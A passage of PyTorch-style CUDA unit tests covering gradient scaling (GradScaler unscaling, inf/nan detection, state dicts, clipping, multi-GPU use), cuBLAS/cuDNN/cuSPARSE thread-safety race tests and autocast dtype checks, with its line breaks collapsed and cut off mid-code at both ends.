= [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)] if TEST_MULTIGPU: grads += [g.to(device="cuda:1"), g.to(device="cuda:1")[:, :5], g.to(device="cuda:1", dtype=torch.float16), g.to(device="cuda:1", dtype=torch.float16)] if inject_inf >= 0: grads[inject_inf][2, 2] = float('inf') return grads scaler = torch.cuda.amp.GradScaler() dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)] dummy_opt = torch.optim.SGD(dummy_params, lr=1.) # Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm. for inject_inf in range(-1, len(dummy_params)): found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0") grads = perfect_storm_grads(inject_inf) for i, p in enumerate(dummy_params): p.grad = grads[i] found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True) if inject_inf < 0: # No inf was injected, ensures unscaling worked normally. self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0) for grad in grads: self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7) else: # inf was injected, ensures inf was found. self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1) def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float): growth = 2.0 backoff = 0.25 growth_interval = 2 scale = torch.full((1,), 4.0, dtype=dtype, device=device) growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device) found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0") # Simulates 2 consecutive unskipped iterations torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval) self.assertEqual(growth_tracker, 1) self.assertEqual(scale, 4.0) torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval) self.assertEqual(growth_tracker, 0) self.assertEqual(scale, 8.0) # Simulates a skipped iteration found_inf.fill_(1.0) torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval) self.assertEqual(growth_tracker, 0) self.assertEqual(scale, 2.0) def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float): scaler = torch.cuda.amp.GradScaler() inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device) found_inf = torch.empty((1,), dtype=dtype, device=device) cur = found_inf.device # As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction. # https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring. # The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout. # Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks # legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor. i = torch.tensor([[0, 1, 1], [2, 0, 2]], device="cuda", dtype=torch.int64) v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float) s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype) p = s.clone() assert p.is_sparse opt = torch.optim.SGD([p], lr=1.) p.grad = s.clone() found_inf.zero_() found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur] self.assertEqual(found_inf, 0.0) self.assertEqual(p.grad.to_dense(), (s / 4).to_dense()) v = torch.FloatTensor([16., 32., float('inf')]) p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype) found_inf.zero_() found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur] self.assertEqual(found_inf, 1.0) v = torch.FloatTensor([16., 32., float('nan')]) p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype) found_inf.zero_() found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur] self.assertEqual(found_inf, 1.0) p = s.clone().half() assert p.is_sparse opt = torch.optim.SGD([p], lr=1.) p.grad = s.clone().half() found_inf.zero_() found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur] self.assertEqual(found_inf, 0.0) self.assertEqual(p.grad.to_dense(), (s.half() / 4).to_dense()) # Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation # does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max. # _amp_non_finite_check_and_unscale_ should report an overflow here. i = torch.LongTensor([[0, 1, 0], [2, 0, 2]]) v = torch.FloatTensor([64000., 32., 64000.]) p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16) found_inf.zero_() found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur] self.assertEqual(found_inf, 1.0) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_grad_scaling_device_as_key(self): # Ensure that different instances of "device" objects that point to the same device # are treated as identical keys by dicts. GradScaler relies on this behavior, and may # error otherwise in a way that's difficult to detect (a silent performance hit). d = {} t = torch.empty((1,), device="cuda:0") dev0a = torch.device("cuda:0") dev0b = torch.device("cuda:0") dev1a = torch.device("cuda:1") dev1b = torch.device("cuda:1") self.assertTrue(hash(dev0a) == hash(dev0b)) self.assertTrue(hash(dev1a) == hash(dev1b)) d[dev0a] = "0a" d[dev0b] = "0b" self.assertTrue(len(d) == 1) self.assertTrue(d[dev0a] == "0b") d[t.device] = "t" self.assertTrue(len(d) == 1) self.assertTrue(d[dev0a] == "t") d[dev1a] = "1a" d[dev1b] = "1b" self.assertTrue(len(d) == 2) self.assertTrue(d[dev1a] == "1b") @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_grad_scaling_scale(self): scaler = torch.cuda.amp.GradScaler(init_scale=2.) t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0") t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1") # Create some nested iterables of tensors on different devices. outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())]) outputs = scaler.scale(outputs) self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0) self.assertTrue(scaler._scale.device == t1.device) def test_grad_scaling_state_dict(self): for lazy_init_scale in True, False: s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2) s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1) # sets a random value for load_state_dict to overwrite s1._init_growth_tracker = 7 if lazy_init_scale: # Dummy scale() call to ensure the scale tensor is lazily initialized. s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")) self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor)) s1.load_state_dict(s0.state_dict()) self.assertEqual(s1.get_scale(), 3.) self.assertEqual(s1.get_growth_factor(), 4.) self.assertEqual(s1.get_backoff_factor(), .5) self.assertEqual(s1.get_growth_interval(), 2) self.assertEqual(s1._init_growth_tracker, 0) def _create_scaling_models_optimizers(self, device="cuda"): # Create a module+optimizer that will use scaling, and a control module+optimizer # that will not use scaling, against which the scaling-enabled module+optimizer can be compared. mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device) mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device) for c, s in zip(mod_control.parameters(), mod_scaling.parameters()): s.data.copy_(c.data) opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0) opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0) return mod_control, mod_scaling, opt_control, opt_scaling def _create_scaling_case(self, device="cuda", dtype=torch.float): data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)), (torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)), (torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)), (torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))] loss_fn = torch.nn.MSELoss().cuda() skip_iter = 2 return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter) # _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below. def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7): # Ensure scaling can be disabled without changing user control flow. for enabled in True, False: mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case() # For functionality, test with a modest initial scale, and an unrealistically-large growth factor # so any potential errors with the growth factor handling will be magnified. scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1) _ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False) ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True) # Allows run() to optionally return a different scaler instance. scaler = ret if ret else scaler # If scaling was enabled, the scale factor should have been multiplied by the growth factor # len(data) - skipped times and the backoff factor "skipped" times. if enabled: net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0 net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0 self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff)) else: self.assertTrue(scaler.get_scale() == 1.0) for c, s in zip(mod_control.parameters(), mod_scaling.parameters()): self.assertEqual(c, s, atol=atol, rtol=1e-05) # Compares no scaling + no autocasting against scaling + autocasting. def test_grad_scaling_autocast(self): try_pickle = False def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api): for i, (input, target) in enumerate(data): optimizer.zero_grad() with torch.autocast('cuda', enabled=try_scaling_api): output = model(input) loss = loss_fn(output, target) if try_scaling_api: scaler.scale(loss).backward() if i == skip_iter and scaler.is_enabled(): model[1].weight.grad.data.fill_(float('inf')) scaler.step(optimizer) scaler.update() if try_pickle: scaler = pickle.loads(pickle.dumps(scaler)) else: loss.backward() if (not scaler.is_enabled()) or (i != skip_iter): optimizer.step() return scaler # sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32 self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3) # this will be picked up by try_pickle within run(): try_pickle = True self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3) def test_grad_scaling_clipping(self): def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api): max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads for i, (input, target) in enumerate(data): optimizer.zero_grad() output = model(input) loss = loss_fn(output, target) if try_scaling_api: scaler.scale(loss).backward() torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale()) if i == skip_iter and scaler.is_enabled(): model[1].weight.grad.data.fill_(float('inf')) scaler.step(optimizer) scaler.update() else: loss.backward() torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm) if (not scaler.is_enabled()) or (i != skip_iter): optimizer.step() self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5) def test_grad_scaling_clipping_separate_unscale(self): def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api): max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads for i, (input, target) in enumerate(data): optimizer.zero_grad() output = model(input) loss = loss_fn(output, target) if try_scaling_api: scaler.scale(loss).backward() if i == skip_iter and scaler.is_enabled(): model[1].weight.grad.data.fill_(float('inf')) scaler.unscale_(optimizer) torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False) scaler.step(optimizer) scaler.update() else: loss.backward() torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm) if (not scaler.is_enabled()) or (i != skip_iter): optimizer.step() self._run_scaling_case(run, unskipped=3, skipped=1) @unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows') def test_grad_scaling_penalty(self): def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api): for i, (input, target) in enumerate(data): optimizer.zero_grad() output = model(input) loss = loss_fn(output, target) if try_scaling_api: grad_params = torch.autograd.grad(scaler.scale(loss), model.parameters(), create_graph=True) inv_scale = 1. / scaler.get_scale() grad_params = [p * inv_scale for p in grad_params] else: grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True) grad_norm = 0 for grad in grad_params: grad_norm += grad.pow(2).sum() grad_norm = grad_norm.sqrt() loss = loss + grad_norm if try_scaling_api: scaler.scale(loss).backward() if i == skip_iter and scaler.is_enabled(): model[1].weight.grad.data.fill_(float('inf')) scaler.step(optimizer) scaler.update() else: loss.backward() if (not scaler.is_enabled()) or (i != skip_iter): optimizer.step() self._run_scaling_case(run, unskipped=3, skipped=1) def test_grad_scaling_accumulation(self): def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api): iters_to_accumulate = 2 for i, (input, target) in enumerate(data): output = model(input) loss = loss_fn(output, target) loss = loss / iters_to_accumulate if try_scaling_api: scaler.scale(loss).backward() else: loss.backward() if (i + 1) % iters_to_accumulate == 0: if try_scaling_api: scaler.step(optimizer) scaler.update() optimizer.zero_grad() else: optimizer.step() optimizer.zero_grad() self._run_scaling_case(run, unskipped=2, skipped=0) def test_grad_scaling_multiple(self): # Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses. # Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases. for enabled in True, False: mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \ self._create_scaling_case() mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \ self._create_scaling_models_optimizers() scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1) def run(model0, model1, optimizer0, optimizer1, try_scaling_api): for i, (input, target) in enumerate(data): optimizer0.zero_grad() optimizer1.zero_grad() output0 = model0(input) output1 = model1(input) loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target) loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target) if try_scaling_api: scaler.scale(loss0).backward(retain_graph=True) scaler.scale(loss1).backward() if i == skip_iter and scaler.is_enabled(): model1[1].weight.grad.data.fill_(float('inf')) # As an additional stress test, separately unscale for one of the optimizers. scaler.unscale_(optimizer0) scaler.step(optimizer0) scaler.step(optimizer1) scaler.update() else: loss0.backward(retain_graph=True) loss1.backward() optimizer0.step() if (not scaler.is_enabled()) or (i != skip_iter): optimizer1.step() run(mod_control0, mod_control1, opt_control0, opt_control1, False) run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True) # The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once. self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 * scaler.get_backoff_factor()**1) if enabled else 1.0) for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()), chain(mod_scaling0.parameters(), mod_scaling1.parameters())): self.assertEqual(c, s, rtol=1e-5, atol=1e-7) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_grad_scaling_multigpu(self): # Same as above, but runs some of the models on device 1. # GradScaler should transparently handle losses and gradients on multiple devices. # This test could be combined with the test above, but I think it makes sense to treat # multi-GPU operations separately. dev0 = torch.device("cuda:0") dev1 = torch.device("cuda:1") for enabled in True, False: mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \ self._create_scaling_case() mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \ self._create_scaling_models_optimizers(device=dev1) scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1) def run(model0, model1, optimizer0, optimizer1, try_scaling_api): for i, (input, target) in enumerate(data): optimizer0.zero_grad() optimizer1.zero_grad() output0 = model0(input) output1 = model1(input.to(dev1)) loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target) loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1)) if try_scaling_api: scaler.scale(loss0).backward(retain_graph=True) scaler.scale(loss1).backward() if i == skip_iter and scaler.is_enabled(): model1[1].weight.grad.data.fill_(float('inf')) # As an additional stress test, separately unscale for one of the optimizers. scaler.unscale_(optimizer0) scaler.step(optimizer0) scaler.step(optimizer1) # Make sure the found_infs were collected properly across optimizers and devices. if scaler.is_enabled(): self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1) self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1) self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.) self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() == float(i == skip_iter)) scaler.update() else: loss0.backward(retain_graph=True) loss1.backward() optimizer0.step() if (not scaler.is_enabled()) or (i != skip_iter): optimizer1.step() run(mod_control0, mod_control1, opt_control0, opt_control1, False) run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True) # The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once. self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 * scaler.get_backoff_factor()**1) if enabled else 1.0) # Copy mod_control1 and mod_scaling1 back the device 0 for comparison mod_control1.to(dev0) mod_scaling1.to(dev0) for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()), chain(mod_scaling0.parameters(), mod_scaling1.parameters())): self.assertEqual(c, s, rtol=1e-5, atol=1e-7) def test_cublas_multiple_threads_same_device(self): # Note, these parameters should be very carefully tuned # Too small number makes it hard for the racing condition # to happen, while too large number sometimes cause hang size = 1024 num_threads = 2 trials = 3 test_iters = 100 weight = torch.ones((size, size), device='cuda') results = {} barrier = threading.Barrier(num_threads) def _worker(t): my_stream = torch.cuda.Stream() # Hard sync so we don't need to worry about creating and using tensors # across streams or the fact that default streams are thread-local. # Those issues are not the target of this test. torch.cuda.synchronize() # Line up threads to increase likelihood of race conditions. barrier.wait() with torch.cuda.stream(my_stream): for i in range(test_iters): # If all threads are sharing the same cublas handle, # the following sequence may occur: # thread 0 calls cublasSetStream() # thread 1 calls cublasSetStream() # thread 0 launches its raw gemm, which it thinks is in # its own stream, but is actually in thread 1's stream. # thread 0 enqueues its div_, which IS is its own stream, # but actually now races with its gemm. results[t] = torch.mm(results[t], weight) results[t].div_(float(size)) torch.cuda.synchronize() for _ in range(trials): for t in range(num_threads): results[t] = torch.ones((size, size), device='cuda') threads = [threading.Thread(target=_worker, args=(t,)) for t in range(num_threads)] for thread in threads: thread.start() for thread in threads: thread.join() for t in range(num_threads): self.assertEqual(results[t].sum().item(), size * size) # Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401) @unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)') @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') @skipIfRocm def test_cudnn_multiple_threads_same_device(self): # This function is intended to test the lazy creation and reuse of per-thread # cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp. # Failure here likely indicates something wrong with that logic. weight = torch.ones((1, 1, 2, 2), device='cuda') results = {} num_threads = 2 trials = 3 test_iters = 1000 barrier = threading.Barrier(num_threads) with torch.backends.cudnn.flags(enabled=True): def _worker(t): my_stream = torch.cuda.Stream() # Hard sync so we don't need to worry about creating and using tensors # across streams or the fact that default streams are thread-local. # Those issues are not the target of this test. torch.cuda.synchronize() # Line up threads to increase likelihood of race conditions. barrier.wait() with torch.cuda.stream(my_stream): for _ in range(test_iters): # If all threads are sharing the same cudnn handle, # the following sequence may occur: # thread 0 calls setCuDNNStreamToCurrent() # thread 1 calls setCuDNNStreamToCurrent() # thread 0 launches its raw convolution, which it thinks is in # its own stream, but is actually in thread 1's stream. # thread 0 enqueues its div_, which IS is its own stream, # but now races with its convolution. results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0) results[t].div_(4.0) torch.cuda.synchronize() for _ in range(trials): for t in range(num_threads): results[t] = torch.ones((1, 1, 2048, 2048), device='cuda') threads = [threading.Thread(target=_worker, args=(t,)) for t in range(num_threads)] for thread in threads: thread.start() for thread in threads: thread.join() for t in range(num_threads): self.assertEqual(results[t].sum().item(), (2048 - test_iters) * (2048 - test_iters)) def test_cusparse_multiple_threads_same_device(self): size = 1024 num_threads = 2 trials = 3 test_iters = 500 def ones_sparse(size): a = torch.arange(size, device='cuda') indices = torch.cartesian_prod(a, a).t() values = torch.ones(size * size, device='cuda') return torch.sparse_coo_tensor(indices, values) weight = ones_sparse(size) results = {} barrier = threading.Barrier(num_threads) def _worker(t): my_stream = torch.cuda.Stream() # Hard sync so we don't need to worry about creating and using tensors # across streams or the fact that default streams are thread-local. # Those issues are not the target of this test. torch.cuda.synchronize() # Line up threads to increase likelihood of race conditions. barrier.wait() with torch.cuda.stream(my_stream): for i in range(test_iters): # If all threads are sharing the same cublas handle, # the following sequence may occur: # thread 0 calls cublasSetStream() # thread 1 calls cublasSetStream() # thread 0 launches its raw gemm, which it thinks is in # its own stream, but is actually in thread 1's stream. # thread 0 enqueues its div_, which IS is its own stream, # but actually now races with its gemm. results[t] = weight.mm(results[t]) results[t].div_(float(size)) torch.cuda.synchronize() for _ in range(trials): for t in range(num_threads): results[t] = torch.ones((size, size), device='cuda') threads = [threading.Thread(target=_worker, args=(t,)) for t in range(num_threads)] for thread in threads: thread.start() for thread in threads: thread.join() for t in range(num_threads): self.assertEqual(results[t].sum().item(), size * size) def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None): # helper to cast args def cast(val, to_type): if isinstance(val, torch.Tensor): return val.to(to_type) if val.is_floating_point() else val elif isinstance(val, collections.abc.Iterable): return type(val)(cast(v, to_type) for v in val) else: return val if add_kwargs is None: add_kwargs = {} fast_dtype = torch.bfloat16 if run_as_type == torch.bfloat16 else torch.float16 self.assertFalse(torch.is_autocast_enabled()) with torch.autocast('cuda', dtype=fast_dtype): self.assertTrue(torch.is_autocast_enabled()) out_type = out_type if out_type is not None else run_as_type output = output_method = None # Try module.* variant, if requested: if module is not None and hasattr(module, op): output = getattr(module, op)(*args, **add_kwargs) if isinstance(output, torch.Tensor): self.assertTrue(out_type == output.dtype, "autocast for torch.{} produced {}, should produce {}" .format(op, output.dtype, out_type)) # Try Tensor.* variant: if hasattr(torch.Tensor, op): output_method = getattr(args[0], op)(*args[1:], **add_kwargs) if isinstance(output_method, torch.Tensor): self.assertTrue(out_type == output_method.dtype, "autocast for torch.{} produced {}, should produce torch.{}" .format(op, output_method.dtype, out_type)) self.assertTrue((output is not None) or (output_method is not None), "{} not found as an attribute on either Tensor or the requested module {}".format( op, module)) # Accounts for ops that return Tensors, iterables, and other non-Tensors. # For example, lstm_cell returns a tuple and equal returns bool. def compare(first, second): if isinstance(first, torch.Tensor): return torch.equal(first, second) elif isinstance(first, collections.abc.Iterable): return all(compare(f, s) for f, s in zip(first, second)) else: return first == second # If both torch.* and Tensor.* variants were found, check outputs are identical if (output is not None) and (output_method is not None): self.assertTrue(type(output) == type(output_method)) comparison = compare(output, output_method) self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op)) # Compare numerics to Python-side "autocasting" that (we expect) does the same thing # as the C++-side autocasting, and should be bitwise accurate. output_to_compare = output if output is not None else output_method with torch.autocast('cuda', enabled=False): self.assertFalse(torch.is_autocast_enabled()) if module is not None and hasattr(module, op): control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs) else: control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs) self.assertTrue(type(output_to_compare) == type(control)) comparison = compare(output_to_compare, control) self.assertTrue(comparison, "torch.{} result did not match control".format(op)) self.assertTrue(torch.is_autocast_enabled()) self.assertFalse(torch.is_autocast_enabled()) def args_maybe_kwargs(self, op_with_args): if len(op_with_args) == 2: return op_with_args[0], op_with_args[1], {} else: return op_with_args[0], op_with_args[1], op_with_args[2] @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') def test_autocast_torch_fp16(self): with torch.backends.cudnn.flags(enabled=True, deterministic=True): for op_with_args in self.autocast_lists.torch_fp16: skip_test = False op, args = op_with_args[0], op_with_args[1] if len(op_with_args) == 3: skip_test = op_with_args[2] # TEST_WITH_ROCM if not skip_test: self._run_autocast_outofplace(op, args, torch.float16) @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') def test_autocast_torch_bf16(self): with torch.backends.cudnn.flags(enabled=True, deterministic=True): for op_with_args in self.autocast_lists.torch_fp16: skip_test = False op, args = op_with_args[0], op_with_args[1] if len(op_with_args) == 3: skip_test = op_with_args[2] # TEST_WITH_ROCM should_error_from_not_implemented = 'cudnn' in op or 'prelu' in op or 'thnn' in op \ or 'fused' in op or 'gru' in op or op == '_thnn_fused_lstm_cell' or op == 'lstm_cell' if not skip_test: if should_error_from_not_implemented: with self.assertRaises(RuntimeError, msg=str(op) + ' should not be supported for bfloat16!'): self._run_autocast_outofplace(op, args, torch.bfloat16) else: if torch.cuda.is_bf16_supported(): self._run_autocast_outofplace(op, args, torch.bfloat16) else: with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'): self._run_autocast_outofplace(op, args, torch.bfloat16) @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') def test_autocast_torch_fp32(self): for op_with_args in self.autocast_lists.torch_fp32: op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args) self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs) @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') def test_autocast_torch_need_autocast_promote(self): for op, args in self.autocast_lists.torch_need_autocast_promote: self._run_autocast_outofplace(op, args, torch.float32) @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') def test_autocast_torch_expect_builtin_promote(self): for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote: self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type) @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') def test_autocast_nn_fp16(self): with torch.backends.cudnn.flags(enabled=True, deterministic=True): for op, args in self.autocast_lists.nn_fp16: self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn) @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') def test_autocast_nn_bf16(self): with torch.backends.cudnn.flags(enabled=True, deterministic=True): for op, args in self.autocast_lists.nn_fp16: if torch.cuda.is_bf16_supported(): self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn) else: with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'): self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn) @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') def test_autocast_nn_fp32(self): for op, args in self.autocast_lists.nn_fp32: self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn) @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') def test_autocast_linalg_fp16(self): with torch.backends.cudnn.flags(enabled=True, deterministic=True): for op, args in self.autocast_lists.linalg_fp16: self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg) @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') def test_autocast_methods_fp16(self): with torch.backends.cudnn.flags(enabled=True, deterministic=True): for op, args in self.autocast_lists.methods_fp16: self._run_autocast_outofplace(op, args, torch.float16, module=None) @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') def test_autocast_methods_fp32(self): for op, args in self.autocast_lists.methods_fp32: self._run_autocast_outofplace(op, args, torch.float32, module=None) @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') def test_autocast_methods_expect_builtin_promote(self): for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote: self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type) def test_autocast_banned(self): with torch.autocast('cuda'): for op, args, module in self.autocast_lists.banned: with self.assertRaises(RuntimeError): getattr(module, op)(*args) def test_autocast_ignored_types(self): with torch.autocast('cuda'): for ignore_type in (torch.double, torch.int32): a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0") b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0") c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0") # Tests if CastPolicy::fp16 ops ignore double and int # Currently, no ops belonging to this policy support integer inputs. if ignore_type is torch.double: with self.assertRaises(RuntimeError): torch.mm(a_ignore, c_16) with torch.autocast('cuda', enabled=False): type_no_autocast = torch.mm(a_ignore, b_ignore).dtype self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast) # Tests if CastPolicy::fp32 ops ignore double and int with torch.autocast('cuda', enabled=False): type_no_autocast = torch.pow(a_ignore, 2.0).dtype self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast) # Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int with torch.autocast('cuda', enabled=False): type_no_autocast = torch.sum(a_ignore).dtype self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast) # Tests if CastPolicy::fp32_append_dtype ops ignore double and int # Currently, no ops belonging to this policy support integer inputs. if ignore_type is torch.double: with torch.autocast('cuda', enabled=False): type_no_autocast = torch.norm(a_ignore).dtype self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast) def test_autocast_custom_enabled(self): class MyMM(torch.autograd.Function): @staticmethod @torch.cuda.amp.custom_fwd def forward(ctx, a, b): self.assertTrue(a.dtype is torch.float32) self.assertTrue(b.dtype is torch.float32) self.assertTrue(torch.is_autocast_enabled()) ctx.save_for_backward(a, b) return a.mm(b) @staticmethod @torch.cuda.amp.custom_bwd def backward(ctx, grad): self.assertTrue(torch.is_autocast_enabled()) a, b = ctx.saved_tensors return grad.mm(b.t()), a.t().mm(grad) mymm = MyMM.apply x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True) y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True) with torch.cuda.amp.autocast(): output = mymm(x, y) self.assertTrue(output.dtype is torch.float16) loss = output.sum() loss.backward() def test_autocast_custom_cast_inputs(self): class 